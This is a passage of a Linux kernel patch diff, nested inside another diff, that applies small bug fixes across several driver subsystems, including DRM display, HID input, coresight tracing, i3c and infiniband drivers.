++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
+@@ -460,7 +460,8 @@ static int dpu_encoder_phys_wb_wait_for_commit_done(
+ 	wait_info.atomic_cnt = &phys_enc->pending_kickoff_cnt;
+ 	wait_info.timeout_ms = KICKOFF_TIMEOUT_MS;
+ 
+-	ret = dpu_encoder_helper_wait_for_irq(phys_enc, INTR_IDX_WB_DONE,
++	ret = dpu_encoder_helper_wait_for_irq(phys_enc,
++			phys_enc->irq[INTR_IDX_WB_DONE],
+ 			dpu_encoder_phys_wb_done_irq, &wait_info);
+ 	if (ret == -ETIMEDOUT)
+ 		_dpu_encoder_phys_wb_handle_wbdone_timeout(phys_enc);
+diff --git a/drivers/gpu/drm/msm/disp/mdp5/mdp5_plane.c b/drivers/gpu/drm/msm/disp/mdp5/mdp5_plane.c
+index bd2c4ac456017..0d5ff03cb0910 100644
+--- a/drivers/gpu/drm/msm/disp/mdp5/mdp5_plane.c
++++ b/drivers/gpu/drm/msm/disp/mdp5/mdp5_plane.c
+@@ -130,8 +130,7 @@ static void mdp5_plane_destroy_state(struct drm_plane *plane,
+ {
+ 	struct mdp5_plane_state *pstate = to_mdp5_plane_state(state);
+ 
+-	if (state->fb)
+-		drm_framebuffer_put(state->fb);
++	__drm_atomic_helper_plane_destroy_state(state);
+ 
+ 	kfree(pstate);
+ }
+diff --git a/drivers/gpu/drm/msm/disp/msm_disp_snapshot_util.c b/drivers/gpu/drm/msm/disp/msm_disp_snapshot_util.c
+index acfe1b31e0792..add72bbc28b17 100644
+--- a/drivers/gpu/drm/msm/disp/msm_disp_snapshot_util.c
++++ b/drivers/gpu/drm/msm/disp/msm_disp_snapshot_util.c
+@@ -192,5 +192,5 @@ void msm_disp_snapshot_add_block(struct msm_disp_state *disp_state, u32 len,
+ 	new_blk->base_addr = base_addr;
+ 
+ 	msm_disp_state_dump_regs(&new_blk->state, new_blk->size, base_addr);
+-	list_add(&new_blk->node, &disp_state->blocks);
++	list_add_tail(&new_blk->node, &disp_state->blocks);
+ }
+diff --git a/drivers/gpu/drm/panel/panel-simple.c b/drivers/gpu/drm/panel/panel-simple.c
+index 5e067ba7e5fba..0e8622ccd3a0f 100644
+--- a/drivers/gpu/drm/panel/panel-simple.c
++++ b/drivers/gpu/drm/panel/panel-simple.c
+@@ -1159,7 +1159,9 @@ static const struct panel_desc auo_t215hvn01 = {
+ 	.delay = {
+ 		.disable = 5,
+ 		.unprepare = 1000,
+-	}
++	},
++	.bus_format = MEDIA_BUS_FMT_RGB888_1X7X4_SPWG,
++	.connector_type = DRM_MODE_CONNECTOR_LVDS,
+ };
+ 
+ static const struct drm_display_mode avic_tm070ddh03_mode = {
+diff --git a/drivers/gpu/drm/radeon/cik.c b/drivers/gpu/drm/radeon/cik.c
+index 5819737c21c67..a6f3c811ceb8e 100644
+--- a/drivers/gpu/drm/radeon/cik.c
++++ b/drivers/gpu/drm/radeon/cik.c
+@@ -9534,17 +9534,8 @@ static void cik_pcie_gen3_enable(struct radeon_device *rdev)
+ 			u16 bridge_cfg2, gpu_cfg2;
+ 			u32 max_lw, current_lw, tmp;
+ 
+-			pcie_capability_read_word(root, PCI_EXP_LNKCTL,
+-						  &bridge_cfg);
+-			pcie_capability_read_word(rdev->pdev, PCI_EXP_LNKCTL,
+-						  &gpu_cfg);
+-
+-			tmp16 = bridge_cfg | PCI_EXP_LNKCTL_HAWD;
+-			pcie_capability_write_word(root, PCI_EXP_LNKCTL, tmp16);
+-
+-			tmp16 = gpu_cfg | PCI_EXP_LNKCTL_HAWD;
+-			pcie_capability_write_word(rdev->pdev, PCI_EXP_LNKCTL,
+-						   tmp16);
++			pcie_capability_set_word(root, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_HAWD);
++			pcie_capability_set_word(rdev->pdev, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_HAWD);
+ 
+ 			tmp = RREG32_PCIE_PORT(PCIE_LC_STATUS1);
+ 			max_lw = (tmp & LC_DETECTED_LINK_WIDTH_MASK) >> LC_DETECTED_LINK_WIDTH_SHIFT;
+@@ -9591,21 +9582,14 @@ static void cik_pcie_gen3_enable(struct radeon_device *rdev)
+ 				msleep(100);
+ 
+ 				/* linkctl */
+-				pcie_capability_read_word(root, PCI_EXP_LNKCTL,
+-							  &tmp16);
+-				tmp16 &= ~PCI_EXP_LNKCTL_HAWD;
+-				tmp16 |= (bridge_cfg & PCI_EXP_LNKCTL_HAWD);
+-				pcie_capability_write_word(root, PCI_EXP_LNKCTL,
+-							   tmp16);
+-
+-				pcie_capability_read_word(rdev->pdev,
+-							  PCI_EXP_LNKCTL,
+-							  &tmp16);
+-				tmp16 &= ~PCI_EXP_LNKCTL_HAWD;
+-				tmp16 |= (gpu_cfg & PCI_EXP_LNKCTL_HAWD);
+-				pcie_capability_write_word(rdev->pdev,
+-							   PCI_EXP_LNKCTL,
+-							   tmp16);
++				pcie_capability_clear_and_set_word(root, PCI_EXP_LNKCTL,
++								   PCI_EXP_LNKCTL_HAWD,
++								   bridge_cfg &
++								   PCI_EXP_LNKCTL_HAWD);
++				pcie_capability_clear_and_set_word(rdev->pdev, PCI_EXP_LNKCTL,
++								   PCI_EXP_LNKCTL_HAWD,
++								   gpu_cfg &
++								   PCI_EXP_LNKCTL_HAWD);
+ 
+ 				/* linkctl2 */
+ 				pcie_capability_read_word(root, PCI_EXP_LNKCTL2,
+diff --git a/drivers/gpu/drm/radeon/si.c b/drivers/gpu/drm/radeon/si.c
+index 8d5e4b25609d5..a91012447b56e 100644
+--- a/drivers/gpu/drm/radeon/si.c
++++ b/drivers/gpu/drm/radeon/si.c
+@@ -7131,17 +7131,8 @@ static void si_pcie_gen3_enable(struct radeon_device *rdev)
+ 			u16 bridge_cfg2, gpu_cfg2;
+ 			u32 max_lw, current_lw, tmp;
+ 
+-			pcie_capability_read_word(root, PCI_EXP_LNKCTL,
+-						  &bridge_cfg);
+-			pcie_capability_read_word(rdev->pdev, PCI_EXP_LNKCTL,
+-						  &gpu_cfg);
+-
+-			tmp16 = bridge_cfg | PCI_EXP_LNKCTL_HAWD;
+-			pcie_capability_write_word(root, PCI_EXP_LNKCTL, tmp16);
+-
+-			tmp16 = gpu_cfg | PCI_EXP_LNKCTL_HAWD;
+-			pcie_capability_write_word(rdev->pdev, PCI_EXP_LNKCTL,
+-						   tmp16);
++			pcie_capability_set_word(root, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_HAWD);
++			pcie_capability_set_word(rdev->pdev, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_HAWD);
+ 
+ 			tmp = RREG32_PCIE(PCIE_LC_STATUS1);
+ 			max_lw = (tmp & LC_DETECTED_LINK_WIDTH_MASK) >> LC_DETECTED_LINK_WIDTH_SHIFT;
+@@ -7188,22 +7179,14 @@ static void si_pcie_gen3_enable(struct radeon_device *rdev)
+ 				msleep(100);
+ 
+ 				/* linkctl */
+-				pcie_capability_read_word(root, PCI_EXP_LNKCTL,
+-							  &tmp16);
+-				tmp16 &= ~PCI_EXP_LNKCTL_HAWD;
+-				tmp16 |= (bridge_cfg & PCI_EXP_LNKCTL_HAWD);
+-				pcie_capability_write_word(root,
+-							   PCI_EXP_LNKCTL,
+-							   tmp16);
+-
+-				pcie_capability_read_word(rdev->pdev,
+-							  PCI_EXP_LNKCTL,
+-							  &tmp16);
+-				tmp16 &= ~PCI_EXP_LNKCTL_HAWD;
+-				tmp16 |= (gpu_cfg & PCI_EXP_LNKCTL_HAWD);
+-				pcie_capability_write_word(rdev->pdev,
+-							   PCI_EXP_LNKCTL,
+-							   tmp16);
++				pcie_capability_clear_and_set_word(root, PCI_EXP_LNKCTL,
++								   PCI_EXP_LNKCTL_HAWD,
++								   bridge_cfg &
++								   PCI_EXP_LNKCTL_HAWD);
++				pcie_capability_clear_and_set_word(rdev->pdev, PCI_EXP_LNKCTL,
++								   PCI_EXP_LNKCTL_HAWD,
++								   gpu_cfg &
++								   PCI_EXP_LNKCTL_HAWD);
+ 
+ 				/* linkctl2 */
+ 				pcie_capability_read_word(root, PCI_EXP_LNKCTL2,
+diff --git a/drivers/gpu/drm/tegra/dpaux.c b/drivers/gpu/drm/tegra/dpaux.c
+index 7dc681e2ee90b..d773ef4854188 100644
+--- a/drivers/gpu/drm/tegra/dpaux.c
++++ b/drivers/gpu/drm/tegra/dpaux.c
+@@ -468,7 +468,7 @@ static int tegra_dpaux_probe(struct platform_device *pdev)
+ 
+ 	dpaux->irq = platform_get_irq(pdev, 0);
+ 	if (dpaux->irq < 0)
+-		return -ENXIO;
++		return dpaux->irq;
+ 
+ 	if (!pdev->dev.pm_domain) {
+ 		dpaux->rst = devm_reset_control_get(&pdev->dev, "dpaux");
+diff --git a/drivers/gpu/drm/tiny/repaper.c b/drivers/gpu/drm/tiny/repaper.c
+index e62f4d16b2c6b..7e2b0e2241358 100644
+--- a/drivers/gpu/drm/tiny/repaper.c
++++ b/drivers/gpu/drm/tiny/repaper.c
+@@ -533,7 +533,7 @@ static int repaper_fb_dirty(struct drm_framebuffer *fb)
+ 	DRM_DEBUG("Flushing [FB:%d] st=%ums\n", fb->base.id,
+ 		  epd->factored_stage_time);
+ 
+-	buf = kmalloc_array(fb->width, fb->height, GFP_KERNEL);
++	buf = kmalloc(fb->width * fb->height / 8, GFP_KERNEL);
+ 	if (!buf) {
+ 		ret = -ENOMEM;
+ 		goto out_exit;
+diff --git a/drivers/gpu/drm/xlnx/zynqmp_dpsub.c b/drivers/gpu/drm/xlnx/zynqmp_dpsub.c
+index 1de2d927c32b0..fcaa958d841c9 100644
+--- a/drivers/gpu/drm/xlnx/zynqmp_dpsub.c
++++ b/drivers/gpu/drm/xlnx/zynqmp_dpsub.c
+@@ -201,7 +201,9 @@ static int zynqmp_dpsub_probe(struct platform_device *pdev)
+ 	dpsub->dev = &pdev->dev;
+ 	platform_set_drvdata(pdev, dpsub);
+ 
+-	dma_set_mask(dpsub->dev, DMA_BIT_MASK(ZYNQMP_DISP_MAX_DMA_BIT));
++	ret = dma_set_mask(dpsub->dev, DMA_BIT_MASK(ZYNQMP_DISP_MAX_DMA_BIT));
++	if (ret)
++		return ret;
+ 
+ 	/* Try the reserved memory. Proceed if there's none. */
+ 	of_reserved_mem_device_init(&pdev->dev);
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index 3acaaca888acd..77ee5e01e6111 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -961,6 +961,7 @@ static void hidinput_configure_usage(struct hid_input *hidinput, struct hid_fiel
+ 			return;
+ 
+ 		case 0x3c: /* Invert */
++			device->quirks &= ~HID_QUIRK_NOINVERT;
+ 			map_key_clear(BTN_TOOL_RUBBER);
+ 			break;
+ 
+@@ -986,9 +987,13 @@ static void hidinput_configure_usage(struct hid_input *hidinput, struct hid_fiel
+ 		case 0x45: /* ERASER */
+ 			/*
+ 			 * This event is reported when eraser tip touches the surface.
+-			 * Actual eraser (BTN_TOOL_RUBBER) is set by Invert usage when
+-			 * tool gets in proximity.
++			 * Actual eraser (BTN_TOOL_RUBBER) is set and released either
++			 * by Invert if tool reports proximity or by Eraser directly.
+ 			 */
++			if (!test_bit(BTN_TOOL_RUBBER, input->keybit)) {
++				device->quirks |= HID_QUIRK_NOINVERT;
++				set_bit(BTN_TOOL_RUBBER, input->keybit);
++			}
+ 			map_key_clear(BTN_TOUCH);
+ 			break;
+ 
+@@ -1532,6 +1537,15 @@ void hidinput_hid_event(struct hid_device *hid, struct hid_field *field, struct
+ 		else if (report->tool != BTN_TOOL_RUBBER)
+ 			/* value is off, tool is not rubber, ignore */
+ 			return;
++		else if (*quirks & HID_QUIRK_NOINVERT &&
++			 !test_bit(BTN_TOUCH, input->key)) {
++			/*
++			 * There is no invert to release the tool, let hid_input
++			 * send BTN_TOUCH with scancode and release the tool after.
++			 */
++			hid_report_release_tool(report, input, BTN_TOOL_RUBBER);
++			return;
++		}
+ 
+ 		/* let hid-input set BTN_TOUCH */
+ 		break;
+diff --git a/drivers/hid/hid-logitech-dj.c b/drivers/hid/hid-logitech-dj.c
+index c358778e070bc..08768e5accedc 100644
+--- a/drivers/hid/hid-logitech-dj.c
++++ b/drivers/hid/hid-logitech-dj.c
+@@ -1285,6 +1285,9 @@ static int logi_dj_recv_switch_to_dj_mode(struct dj_receiver_dev *djrcv_dev,
+ 		 * 50 msec should gives enough time to the receiver to be ready.
+ 		 */
+ 		msleep(50);
++
++		if (retval)
++			return retval;
+ 	}
+ 
+ 	/*
+@@ -1306,7 +1309,7 @@ static int logi_dj_recv_switch_to_dj_mode(struct dj_receiver_dev *djrcv_dev,
+ 	buf[5] = 0x09;
+ 	buf[6] = 0x00;
+ 
+-	hid_hw_raw_request(hdev, REPORT_ID_HIDPP_SHORT, buf,
++	retval = hid_hw_raw_request(hdev, REPORT_ID_HIDPP_SHORT, buf,
+ 			HIDPP_REPORT_SHORT_LENGTH, HID_OUTPUT_REPORT,
+ 			HID_REQ_SET_REPORT);
+ 
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index e31be0cb8b850..521b2ffb42449 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -1594,7 +1594,6 @@ static void mt_post_parse(struct mt_device *td, struct mt_application *app)
+ static int mt_input_configured(struct hid_device *hdev, struct hid_input *hi)
+ {
+ 	struct mt_device *td = hid_get_drvdata(hdev);
+-	char *name;
+ 	const char *suffix = NULL;
+ 	struct mt_report_data *rdata;
+ 	struct mt_application *mt_application = NULL;
+@@ -1645,15 +1644,9 @@ static int mt_input_configured(struct hid_device *hdev, struct hid_input *hi)
+ 		break;
+ 	}
+ 
+-	if (suffix) {
+-		name = devm_kzalloc(&hi->input->dev,
+-				    strlen(hdev->name) + strlen(suffix) + 2,
+-				    GFP_KERNEL);
+-		if (name) {
+-			sprintf(name, "%s %s", hdev->name, suffix);
+-			hi->input->name = name;
+-		}
+-	}
++	if (suffix)
++		hi->input->name = devm_kasprintf(&hdev->dev, GFP_KERNEL,
++						 "%s %s", hdev->name, suffix);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/hid/hid-uclogic-core.c b/drivers/hid/hid-uclogic-core.c
+index bfbb51f8b5beb..39114d5c55a0e 100644
+--- a/drivers/hid/hid-uclogic-core.c
++++ b/drivers/hid/hid-uclogic-core.c
+@@ -85,10 +85,8 @@ static int uclogic_input_configured(struct hid_device *hdev,
+ {
+ 	struct uclogic_drvdata *drvdata = hid_get_drvdata(hdev);
+ 	struct uclogic_params *params = &drvdata->params;
+-	char *name;
+ 	const char *suffix = NULL;
+ 	struct hid_field *field;
+-	size_t len;
+ 	size_t i;
+ 	const struct uclogic_params_frame *frame;
+ 
+@@ -146,14 +144,9 @@ static int uclogic_input_configured(struct hid_device *hdev,
+ 		}
+ 	}
+ 
+-	if (suffix) {
+-		len = strlen(hdev->name) + 2 + strlen(suffix);
+-		name = devm_kzalloc(&hi->input->dev, len, GFP_KERNEL);
+-		if (name) {
+-			snprintf(name, len, "%s %s", hdev->name, suffix);
+-			hi->input->name = name;
+-		}
+-	}
++	if (suffix)
++		hi->input->name = devm_kasprintf(&hdev->dev, GFP_KERNEL,
++						 "%s %s", hdev->name, suffix);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/hv/vmbus_drv.c b/drivers/hv/vmbus_drv.c
+index b03cb7ae7fd38..e9c3f1e826baa 100644
+--- a/drivers/hv/vmbus_drv.c
++++ b/drivers/hv/vmbus_drv.c
+@@ -2452,7 +2452,8 @@ static int vmbus_acpi_add(struct acpi_device *device)
+ 	 * Some ancestor of the vmbus acpi device (Gen1 or Gen2
+ 	 * firmware) is the VMOD that has the mmio ranges. Get that.
+ 	 */
+-	for (ancestor = acpi_dev_parent(device); ancestor;
++	for (ancestor = acpi_dev_parent(device);
++	     ancestor && ancestor->handle != ACPI_ROOT_OBJECT;
+ 	     ancestor = acpi_dev_parent(ancestor)) {
+ 		result = acpi_walk_resources(ancestor->handle, METHOD_NAME__CRS,
+ 					     vmbus_walk_resources, NULL);
+diff --git a/drivers/hwmon/tmp513.c b/drivers/hwmon/tmp513.c
+index 7d5f7441aceb1..b9a93ee9c2364 100644
+--- a/drivers/hwmon/tmp513.c
++++ b/drivers/hwmon/tmp513.c
+@@ -434,7 +434,7 @@ static umode_t tmp51x_is_visible(const void *_data,
+ 
+ 	switch (type) {
+ 	case hwmon_temp:
+-		if (data->id == tmp512 && channel == 4)
++		if (data->id == tmp512 && channel == 3)
+ 			return 0;
+ 		switch (attr) {
+ 		case hwmon_temp_input:
+diff --git a/drivers/hwtracing/coresight/coresight-tmc-etf.c b/drivers/hwtracing/coresight/coresight-tmc-etf.c
+index 4c4cbd1f72584..3f207999377f0 100644
+--- a/drivers/hwtracing/coresight/coresight-tmc-etf.c
++++ b/drivers/hwtracing/coresight/coresight-tmc-etf.c
+@@ -428,7 +428,7 @@ static int tmc_set_etf_buffer(struct coresight_device *csdev,
+ 		return -EINVAL;
+ 
+ 	/* wrap head around to the amount of space we have */
+-	head = handle->head & ((buf->nr_pages << PAGE_SHIFT) - 1);
++	head = handle->head & (((unsigned long)buf->nr_pages << PAGE_SHIFT) - 1);
+ 
+ 	/* find the page to write to */
+ 	buf->cur = head / PAGE_SIZE;
+diff --git a/drivers/hwtracing/coresight/coresight-tmc-etr.c b/drivers/hwtracing/coresight/coresight-tmc-etr.c
+index 368f2e5a86278..1be0e5e0e80b2 100644
+--- a/drivers/hwtracing/coresight/coresight-tmc-etr.c
++++ b/drivers/hwtracing/coresight/coresight-tmc-etr.c
+@@ -45,7 +45,8 @@ struct etr_perf_buffer {
+ };
+ 
+ /* Convert the perf index to an offset within the ETR buffer */
+-#define PERF_IDX2OFF(idx, buf)	((idx) % ((buf)->nr_pages << PAGE_SHIFT))
++#define PERF_IDX2OFF(idx, buf)		\
++		((idx) % ((unsigned long)(buf)->nr_pages << PAGE_SHIFT))
+ 
+ /* Lower limit for ETR hardware buffer */
+ #define TMC_ETR_PERF_MIN_BUF_SIZE	SZ_1M
+@@ -1249,7 +1250,7 @@ alloc_etr_buf(struct tmc_drvdata *drvdata, struct perf_event *event,
+ 	 * than the size requested via sysfs.
+ 	 */
+ 	if ((nr_pages << PAGE_SHIFT) > drvdata->size) {
+-		etr_buf = tmc_alloc_etr_buf(drvdata, (nr_pages << PAGE_SHIFT),
++		etr_buf = tmc_alloc_etr_buf(drvdata, ((ssize_t)nr_pages << PAGE_SHIFT),
+ 					    0, node, NULL);
+ 		if (!IS_ERR(etr_buf))
+ 			goto done;
+diff --git a/drivers/hwtracing/coresight/coresight-tmc.h b/drivers/hwtracing/coresight/coresight-tmc.h
+index 66959557cf398..946aab12f9807 100644
+--- a/drivers/hwtracing/coresight/coresight-tmc.h
++++ b/drivers/hwtracing/coresight/coresight-tmc.h
+@@ -325,7 +325,7 @@ ssize_t tmc_sg_table_get_data(struct tmc_sg_table *sg_table,
+ static inline unsigned long
+ tmc_sg_table_buf_size(struct tmc_sg_table *sg_table)
+ {
+-	return sg_table->data_pages.nr_pages << PAGE_SHIFT;
++	return (unsigned long)sg_table->data_pages.nr_pages << PAGE_SHIFT;
+ }
+ 
+ struct coresight_device *tmc_etr_get_catu_device(struct tmc_drvdata *drvdata);
+diff --git a/drivers/hwtracing/coresight/coresight-trbe.c b/drivers/hwtracing/coresight/coresight-trbe.c
+index 1fc4fd79a1c69..925f6c9cecff4 100644
+--- a/drivers/hwtracing/coresight/coresight-trbe.c
++++ b/drivers/hwtracing/coresight/coresight-trbe.c
+@@ -1223,6 +1223,16 @@ static void arm_trbe_enable_cpu(void *info)
+ 	enable_percpu_irq(drvdata->irq, IRQ_TYPE_NONE);
+ }
+ 
++static void arm_trbe_disable_cpu(void *info)
++{
++	struct trbe_drvdata *drvdata = info;
++	struct trbe_cpudata *cpudata = this_cpu_ptr(drvdata->cpudata);
++
++	disable_percpu_irq(drvdata->irq);
++	trbe_reset_local(cpudata);
++}
++
++
+ static void arm_trbe_register_coresight_cpu(struct trbe_drvdata *drvdata, int cpu)
+ {
+ 	struct trbe_cpudata *cpudata = per_cpu_ptr(drvdata->cpudata, cpu);
+@@ -1324,18 +1334,12 @@ cpu_clear:
+ 	cpumask_clear_cpu(cpu, &drvdata->supported_cpus);
+ }
+ 
+-static void arm_trbe_remove_coresight_cpu(void *info)
++static void arm_trbe_remove_coresight_cpu(struct trbe_drvdata *drvdata, int cpu)
+ {
+-	int cpu = smp_processor_id();
+-	struct trbe_drvdata *drvdata = info;
+-	struct trbe_cpudata *cpudata = per_cpu_ptr(drvdata->cpudata, cpu);
+ 	struct coresight_device *trbe_csdev = coresight_get_percpu_sink(cpu);
+ 
+-	disable_percpu_irq(drvdata->irq);
+-	trbe_reset_local(cpudata);
+ 	if (trbe_csdev) {
+ 		coresight_unregister(trbe_csdev);
+-		cpudata->drvdata = NULL;
+ 		coresight_set_percpu_sink(cpu, NULL);
+ 	}
+ }
+@@ -1364,8 +1368,10 @@ static int arm_trbe_remove_coresight(struct trbe_drvdata *drvdata)
+ {
+ 	int cpu;
+ 
+-	for_each_cpu(cpu, &drvdata->supported_cpus)
+-		smp_call_function_single(cpu, arm_trbe_remove_coresight_cpu, drvdata, 1);
++	for_each_cpu(cpu, &drvdata->supported_cpus) {
++		smp_call_function_single(cpu, arm_trbe_disable_cpu, drvdata, 1);
++		arm_trbe_remove_coresight_cpu(drvdata, cpu);
++	}
+ 	free_percpu(drvdata->cpudata);
+ 	return 0;
+ }
+@@ -1404,12 +1410,8 @@ static int arm_trbe_cpu_teardown(unsigned int cpu, struct hlist_node *node)
+ {
+ 	struct trbe_drvdata *drvdata = hlist_entry_safe(node, struct trbe_drvdata, hotplug_node);
+ 
+-	if (cpumask_test_cpu(cpu, &drvdata->supported_cpus)) {
+-		struct trbe_cpudata *cpudata = per_cpu_ptr(drvdata->cpudata, cpu);
+-
+-		disable_percpu_irq(drvdata->irq);
+-		trbe_reset_local(cpudata);
+-	}
++	if (cpumask_test_cpu(cpu, &drvdata->supported_cpus))
++		arm_trbe_disable_cpu(drvdata);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/i2c/i2c-core-of.c b/drivers/i2c/i2c-core-of.c
+index 3ed74aa4b44bb..1073f82d5dd47 100644
+--- a/drivers/i2c/i2c-core-of.c
++++ b/drivers/i2c/i2c-core-of.c
+@@ -244,6 +244,11 @@ static int of_i2c_notify(struct notifier_block *nb, unsigned long action,
+ 			return NOTIFY_OK;
+ 		}
+ 
++		/*
++		 * Clear the flag before adding the device so that fw_devlink
++		 * doesn't skip adding consumers to this device.
++		 */
++		rd->dn->fwnode.flags &= ~FWNODE_FLAG_NOT_DEVICE;
+ 		client = of_i2c_register_device(adap, rd->dn);
+ 		if (IS_ERR(client)) {
+ 			dev_err(&adap->dev, "failed to create client for '%pOF'\n",
+diff --git a/drivers/i3c/master/svc-i3c-master.c b/drivers/i3c/master/svc-i3c-master.c
+index d47360f8a1f36..4eebf15f685a3 100644
+--- a/drivers/i3c/master/svc-i3c-master.c
++++ b/drivers/i3c/master/svc-i3c-master.c
+@@ -782,6 +782,10 @@ static int svc_i3c_master_do_daa_locked(struct svc_i3c_master *master,
+ 				 */
+ 				break;
+ 			} else if (SVC_I3C_MSTATUS_NACKED(reg)) {
++				/* No I3C devices attached */
++				if (dev_nb == 0)
++					break;
++
+ 				/*
+ 				 * A slave device nacked the address, this is
+ 				 * allowed only once, DAA will be stopped and
+@@ -1251,11 +1255,17 @@ static int svc_i3c_master_send_ccc_cmd(struct i3c_master_controller *m,
+ {
+ 	struct svc_i3c_master *master = to_svc_i3c_master(m);
+ 	bool broadcast = cmd->id < 0x80;
++	int ret;
+ 
+ 	if (broadcast)
+-		return svc_i3c_master_send_bdcast_ccc_cmd(master, cmd);
++		ret = svc_i3c_master_send_bdcast_ccc_cmd(master, cmd);
+ 	else
+-		return svc_i3c_master_send_direct_ccc_cmd(master, cmd);
++		ret = svc_i3c_master_send_direct_ccc_cmd(master, cmd);
++
++	if (ret)
++		cmd->err = I3C_ERROR_M2;
++
++	return ret;
+ }
+ 
+ static int svc_i3c_master_priv_xfers(struct i3c_dev_desc *dev,
+diff --git a/drivers/iio/accel/adxl313_i2c.c b/drivers/iio/accel/adxl313_i2c.c
+index 99cc7fc294882..68785bd3ef2f0 100644
+--- a/drivers/iio/accel/adxl313_i2c.c
++++ b/drivers/iio/accel/adxl313_i2c.c
+@@ -40,8 +40,8 @@ static const struct regmap_config adxl31x_i2c_regmap_config[] = {
+ 
+ static const struct i2c_device_id adxl313_i2c_id[] = {
+ 	{ .name = "adxl312", .driver_data = (kernel_ulong_t)&adxl31x_chip_info[ADXL312] },
+-	{ .name = "adxl313", .driver_data = (kernel_ulong_t)&adxl31x_chip_info[ADXL312] },
+-	{ .name = "adxl314", .driver_data = (kernel_ulong_t)&adxl31x_chip_info[ADXL312] },
++	{ .name = "adxl313", .driver_data = (kernel_ulong_t)&adxl31x_chip_info[ADXL313] },
++	{ .name = "adxl314", .driver_data = (kernel_ulong_t)&adxl31x_chip_info[ADXL314] },
+ 	{ }
+ };
+ 
+diff --git a/drivers/infiniband/core/uverbs_std_types_counters.c b/drivers/infiniband/core/uverbs_std_types_counters.c
+index 999da9c798668..381aa57976417 100644
+--- a/drivers/infiniband/core/uverbs_std_types_counters.c
++++ b/drivers/infiniband/core/uverbs_std_types_counters.c
+@@ -107,6 +107,8 @@ static int UVERBS_HANDLER(UVERBS_METHOD_COUNTERS_READ)(
+ 		return ret;
+ 
+ 	uattr = uverbs_attr_get(attrs, UVERBS_ATTR_READ_COUNTERS_BUFF);
++	if (IS_ERR(uattr))
++		return PTR_ERR(uattr);
+ 	read_attr.ncounters = uattr->ptr_attr.len / sizeof(u64);
+ 	read_attr.counters_buff = uverbs_zalloc(
+ 		attrs, array_size(read_attr.ncounters, sizeof(u64)));
+diff --git a/drivers/infiniband/hw/efa/efa_verbs.c b/drivers/infiniband/hw/efa/efa_verbs.c
+index f9526a4c75b26..90d5f1a96f3e5 100644
+--- a/drivers/infiniband/hw/efa/efa_verbs.c
++++ b/drivers/infiniband/hw/efa/efa_verbs.c
+@@ -443,12 +443,12 @@ int efa_destroy_qp(struct ib_qp *ibqp, struct ib_udata *udata)
+ 
+ 	ibdev_dbg(&dev->ibdev, "Destroy qp[%u]\n", ibqp->qp_num);
+ 
+-	efa_qp_user_mmap_entries_remove(qp);
+-
+ 	err = efa_destroy_qp_handle(dev, qp->qp_handle);
+ 	if (err)
+ 		return err;
+ 
++	efa_qp_user_mmap_entries_remove(qp);
++
+ 	if (qp->rq_cpu_addr) {
+ 		ibdev_dbg(&dev->ibdev,
+ 			  "qp->cpu_addr[0x%p] freed: size[%lu], dma[%pad]\n",
+@@ -1007,8 +1007,8 @@ int efa_destroy_cq(struct ib_cq *ibcq, struct ib_udata *udata)
+ 		  "Destroy cq[%d] virt[0x%p] freed: size[%lu], dma[%pad]\n",
+ 		  cq->cq_idx, cq->cpu_addr, cq->size, &cq->dma_addr);
+ 
+-	efa_cq_user_mmap_entries_remove(cq);
+ 	efa_destroy_cq_idx(dev, cq->cq_idx);
++	efa_cq_user_mmap_entries_remove(cq);
+ 	if (cq->eq) {
+ 		xa_erase(&dev->cqs_xa, cq->cq_idx);
+ 		synchronize_irq(cq->eq->irq.irqn);
+diff --git a/drivers/infiniband/hw/hns/hns_roce_device.h b/drivers/infiniband/hw/hns/hns_roce_device.h
+index f701cc86896b3..1112afa0af552 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_device.h
++++ b/drivers/infiniband/hw/hns/hns_roce_device.h
+@@ -97,6 +97,7 @@
+ #define HNS_ROCE_CQ_BANK_NUM 4
+ 
+ #define CQ_BANKID_SHIFT 2
++#define CQ_BANKID_MASK GENMASK(1, 0)
+ 
+ enum {
+ 	SERV_TYPE_RC,
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index 34a270b6891a9..33980485ef5ba 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -757,7 +757,8 @@ out:
+ 		qp->sq.head += nreq;
+ 		qp->next_sge = sge_idx;
+ 
+-		if (nreq == 1 && (qp->en_flags & HNS_ROCE_QP_CAP_DIRECT_WQE))
++		if (nreq == 1 && !ret &&
++		    (qp->en_flags & HNS_ROCE_QP_CAP_DIRECT_WQE))
+ 			write_dwqe(hr_dev, qp, wqe);
+ 		else
+ 			update_sq_db(hr_dev, qp);
+@@ -6864,14 +6865,14 @@ static int __hns_roce_hw_v2_init_instance(struct hnae3_handle *handle)
+ 	ret = hns_roce_init(hr_dev);
+ 	if (ret) {
+ 		dev_err(hr_dev->dev, "RoCE Engine init failed!\n");
+-		goto error_failed_cfg;
++		goto error_failed_roce_init;
+ 	}
+ 
+ 	if (hr_dev->pci_dev->revision == PCI_REVISION_ID_HIP08) {
+ 		ret = free_mr_init(hr_dev);
+ 		if (ret) {
+ 			dev_err(hr_dev->dev, "failed to init free mr!\n");
+-			goto error_failed_roce_init;
++			goto error_failed_free_mr_init;
+ 		}
+ 	}
+ 
+@@ -6879,10 +6880,10 @@ static int __hns_roce_hw_v2_init_instance(struct hnae3_handle *handle)
+ 
+ 	return 0;
+ 
+-error_failed_roce_init:
++error_failed_free_mr_init:
+ 	hns_roce_exit(hr_dev);
+ 
+-error_failed_cfg:
++error_failed_roce_init:
+ 	kfree(hr_dev->priv);
+ 
+ error_failed_kzalloc:
